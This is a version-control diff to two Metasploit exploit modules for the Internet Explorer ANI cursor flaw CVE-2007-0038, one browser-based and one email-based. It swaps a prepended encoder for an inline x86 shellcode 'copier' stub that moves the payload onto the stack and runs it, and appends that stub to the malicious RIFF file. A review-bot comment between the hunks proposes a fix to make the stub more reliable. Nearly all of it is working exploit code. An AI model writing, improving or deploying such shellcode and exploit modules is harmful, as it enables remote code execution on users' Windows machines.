Fixed the copy-to-stack stub, should work great now

git-svn-id: file:///home/svn/framework3/trunk@4610 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-04-02 05:42:27 +00:00
parent ac19614bb3
commit b2ff98b4e9
2 changed files with 37 additions and 31 deletions


@ -66,20 +66,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
{
'ConnectionType' => '-find',
},
'PrependEncoder' =>
# Our ANI file is randomly placed into a read-only segment, the only reliable
# solution is to copy our payload back to the stack and execute it there. This
# is non-optimal and should be replaced soon.
"\xeb\x0f"+ # jmp _end
"\x68\x70\x17\x00\x00"+ # push 6000
"\x59"+ # pop ecx
"\x5e"+ # pop esi
"\x29\xcc"+ # sub esp, ecx
"\x89\xe7"+ # mov edi, esp
"\xf3\xa4"+ # rep movsb
"\xff\xe4"+ # jmp esp
"\xe8\xec\xff\xff\xff", # call _start
'StackAdjustment' => -3500,
},
'Platform' => 'win',
@ -308,9 +295,25 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
# payload itself which comes after the riff chunk
riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
end
# Our ANI file is randomly placed into a read-only segment, the only reliable
# solution is to copy our payload back to the stack and execute it there. This
# is non-optimal and should be replaced soon.
copier =
"\xeb\x13"+ # jmp _end
"\x68\x00\x04\x00\x00"+ # push 1024
"\x59"+ # pop ecx
"\x5e"+ # pop esi
"\x29\xcc"+ # sub esp, ecx
"\x89\xe7"+ # mov edi, esp
"\xf3\xa4"+ # rep movsb
"\x89\xe3"+ # mov ebx, esp
"\x29\xcc"+ # sub esp, ecx
"\xff\xe3"+ # jmp ebx
"\xe8\xe8\xff\xff\xff" # call _start
# Place the RIFF chunk in front and off we go
ret = "RIFF" + [riff.length].pack('V') + riff + payload.encoded
ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded
end
# Generates a riff chunk with the first bytes of the data being a relative
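Review bot: The copier in the second hunk hard-codes the byte count (`"\x68\x00\x04\x00\x00"+ # push 1024`), so it is only correct while the module's payload 'Space' is exactly 1024; the Email module sets that in its first hunk, but the Browser module's 'Space' is outside this hunk, and any mismatch means `rep movsb` either copies only part of `payload.encoded` or reads past its end into whatever follows the buffer. Deriving the count from what is actually appended keeps the two in step, e.g. `"\x68" + [payload.encoded.length].pack('V') +` in place of the hard-coded push, with the `# push 1024` comment updated to match (this presumes `payload.encoded` is already final at the point the copier is built, which the `ret =` line suggests). The same stub and the three-line comment above it are duplicated verbatim in Exploits::Windows::Email::IE_ANI_CVE_2007_0038 (the second file section), where the same change applies; a shared constant or helper would keep the two modules from drifting apart again. The enclosing method (closed by the `end` after the `ret =` line) starts above this hunk.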


@ -57,25 +57,12 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
},
'Payload' =>
{
'Space' => 4000 + (rand(1000)),
'Space' => 1024,
'MinNops' => 32,
'Compat' =>
{
'ConnectionType' => '-bind -find',
},
'PrependEncoder' =>
# Our ANI file is randomly placed into a read-only segment, the only reliable
# solution is to copy our payload back to the stack and execute it there. This
# is non-optimal and should be replaced soon.
"\xeb\x0f"+ # jmp _end
"\x68\x70\x17\x00\x00"+ # push 6000
"\x59"+ # pop ecx
"\x5e"+ # pop esi
"\x29\xcc"+ # sub esp, ecx
"\x89\xe7"+ # mov edi, esp
"\xf3\xa4"+ # rep movsb
"\xff\xe4"+ # jmp esp
"\xe8\xec\xff\xff\xff", # call _start
'StackAdjustment' => -3500,
},
@ -293,8 +280,24 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
end
# Our ANI file is randomly placed into a read-only segment, the only reliable
# solution is to copy our payload back to the stack and execute it there. This
# is non-optimal and should be replaced soon.
copier =
"\xeb\x13"+ # jmp _end
"\x68\x00\x04\x00\x00"+ # push 1024
"\x59"+ # pop ecx
"\x5e"+ # pop esi
"\x29\xcc"+ # sub esp, ecx
"\x89\xe7"+ # mov edi, esp
"\xf3\xa4"+ # rep movsb
"\x89\xe3"+ # mov ebx, esp
"\x29\xcc"+ # sub esp, ecx
"\xff\xe3"+ # jmp ebx
"\xe8\xe8\xff\xff\xff" # call _start
# Place the RIFF chunk in front and off we go
ret = "RIFF" + [riff.length].pack('V') + riff + payload.encoded
ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded
end
# Generates a riff chunk with the first bytes of the data being a relative